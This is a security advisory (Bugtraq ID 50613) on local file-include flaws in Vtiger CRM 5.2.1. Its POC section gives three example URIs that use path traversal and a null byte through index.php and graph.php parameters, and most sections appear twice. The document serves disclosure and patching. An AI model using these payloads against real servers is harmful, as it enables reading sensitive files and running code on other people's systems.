Vtiger CRM Multiple Local File Include Vulnerabilities
BID:50613
Info
Vtiger CRM Multiple Local File Include Vulnerabilities
| Bugtraq ID: | 50613 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 09 2011 12:00AM |
| Updated: | Nov 09 2011 12:00AM |
| Credit: | High-Tech Bridge SA Security Research Lab |
| Vulnerable: |
vtiger vtiger CRM 5.2.1 |
| Not Vulnerable: | |
Discussion
Vtiger CRM Multiple Local File Include Vulnerabilities
Vtiger CRM is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
Vtiger CRM 5.2.1 is vulnerable; prior versions may also be affected.
Vtiger CRM is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
Vtiger CRM 5.2.1 is vulnerable; prior versions may also be affected.
Exploit / POC
Vtiger CRM Multiple Local File Include Vulnerabilities
Attackers can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/index.php?module=Accounts&action=AccountsAjax&ajax=true&file=AddressChange& file=../../storage/2011/October/week3/UploadedFile.txt%00
http://www.example.com/graph.php?module=../storage/2011/October/week3/UploadedFile.txt%00
http://www.example.com/graph.php?module=1&action=../../storage/2011/October/week /UploadedFile.txt%00
Attackers can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/index.php?module=Accounts&action=AccountsAjax&ajax=true&file=AddressChange& file=../../storage/2011/October/week3/UploadedFile.txt%00
http://www.example.com/graph.php?module=../storage/2011/October/week3/UploadedFile.txt%00
http://www.example.com/graph.php?module=1&action=../../storage/2011/October/week /UploadedFile.txt%00
Solution / Fix
Vtiger CRM Multiple Local File Include Vulnerabilities
Solution:
Updates are available. Please see the references for more information.
Solution:
Updates are available. Please see the references for more information.
References
Vtiger CRM Multiple Local File Include Vulnerabilities
References:
References:
- chagelog (vtiger)
- Local file inclusion in VtigerCRM ( High-Tech Bridge SA Security Research Lab)
- vtiger Homepage (vtiger)